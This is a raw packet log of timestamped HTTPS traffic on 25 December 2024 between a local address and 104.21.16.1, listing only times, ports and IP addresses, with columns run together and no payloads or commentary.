                                                                                                                                  Dec 25, 2024 15:09:15.161967039 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.163006067 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.163089991 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.165308952 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.165380001 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.168544054 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.168611050 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.168626070 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.173489094 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.173511028 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.173588037 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.173604012 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.175702095 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.175776005 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.175786018 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.175827980 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.178105116 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.178174019 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.179084063 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.179162979 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.181427002 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.181499004 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.182900906 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.182959080 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.183723927 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.183784008 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.184602976 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.184660912 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.187767982 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.187855005 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.187865973 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.187911034 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.193409920 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.193486929 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.195156097 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.195239067 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.198257923 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.198318958 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.198329926 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.243025064 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.267388105 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.267457008 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.267472029 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.318943977 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.318964958 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.319020987 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.319036961 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.319068909 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.353780985 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.353849888 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.353864908 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.353920937 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.358988047 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.359018087 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.359054089 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.359065056 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.359091997 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.359112978 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.360702991 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.360761881 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.363936901 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.364001036 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.364007950 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.364058018 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.366261959 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.366322041 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.367047071 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.367100954 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.367902994 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.367966890 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.373471022 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.373512030 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.373539925 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.373548985 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.373589039 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.374444008 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.374499083 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.374507904 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.374553919 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.377424955 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.377485037 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.377492905 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.378269911 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.378401041 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.378408909 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.385205984 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.385242939 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.385276079 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.385288000 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.385335922 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.386019945 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.386075020 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.387494087 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.387545109 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.389888048 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.389955044 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.389962912 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.390002966 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.459352970 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.459492922 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.462212086 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.462254047 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.462300062 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.462313890 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.462323904 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.508686066 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.511975050 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.512013912 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.512099028 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.512113094 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.512164116 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.548113108 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.548206091 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.548218012 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.548264980 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.551302910 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.551381111 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.551388025 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.553061962 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.553122997 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.553132057 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.557846069 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.557868004 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.557930946 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.557941914 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.557970047 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.560971022 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.561039925 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.561049938 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.565866947 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.565892935 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.565944910 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.565953970 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.565983057 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.567452908 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.567513943 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.567522049 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.569880962 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.569948912 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.569958925 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.570005894 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.578140974 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.578180075 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.578214884 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.578222990 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.578250885 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.578264952 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.579499960 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.579559088 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.651560068 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.651583910 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.651679993 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.651695967 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.651755095 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.655725956 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.655764103 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.655797958 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.655813932 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.655823946 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.655858994 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.739449024 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.739476919 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.739568949 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.739583969 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.739691973 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.744914055 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.744940996 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.744990110 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.744998932 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.745031118 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.745052099 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.750413895 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.750436068 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.750475883 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.750483036 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.750514030 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.750533104 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.756037951 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.756058931 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.756104946 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.756112099 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.756135941 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.756160021 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.760962963 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.760986090 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.761058092 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.761066914 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.761095047 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.761123896 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.770499945 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.770520926 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.770582914 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.770591021 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.770620108 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.770648003 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.776010990 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.776034117 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.776086092 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.776093960 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.776129961 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.776143074 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.847624063 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.847647905 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.847724915 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.847745895 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.848254919 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.931946039 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.931972027 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.932023048 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.932035923 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.932061911 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.932079077 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.937402964 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.937424898 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.937460899 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.937467098 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.937491894 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.937505960 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.943089008 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.943113089 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.943151951 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.943161964 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.943172932 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.943203926 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.947968006 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.947990894 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.948048115 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.948055983 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.948085070 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.948101044 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.953455925 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.953479052 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.953581095 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.953589916 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.954133987 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.962728977 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.962754011 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.962799072 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.962809086 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.962840080 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.962860107 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.968241930 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.968271017 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.968316078 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.968322992 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:15.968353987 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:15.968377113 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:16.039844990 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:16.039866924 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:16.039916992 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:16.039935112 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:16.039958000 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:16.039984941 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:16.124248028 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:16.124274969 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:16.124429941 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:16.124429941 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:16.124458075 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:16.124520063 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:16.129690886 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:16.129713058 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:16.129772902 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:16.129781008 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:16.129829884 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:16.135349989 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:16.135371923 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:16.135417938 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:16.135426044 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:16.135443926 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:16.135473967 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:16.140243053 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:16.140264988 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:16.140307903 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:16.140316010 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:16.140341997 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:16.140377045 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:16.145761013 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:16.145781994 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:16.145834923 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:16.145843029 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:16.145895958 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:16.154989958 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:16.155016899 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:16.155090094 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:16.155097961 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:16.155148983 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:16.160362005 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:16.160386086 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:16.160432100 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:16.160439968 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:16.160468102 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:16.160489082 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:16.232764959 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:16.232786894 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:16.232881069 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:16.232919931 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:16.232965946 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:16.316360950 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:16.316385984 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:16.316561937 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:16.316589117 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:16.318130016 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:16.321834087 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:16.321861029 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:16.321904898 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:16.321913004 CET44349734104.21.16.1192.168.2.4
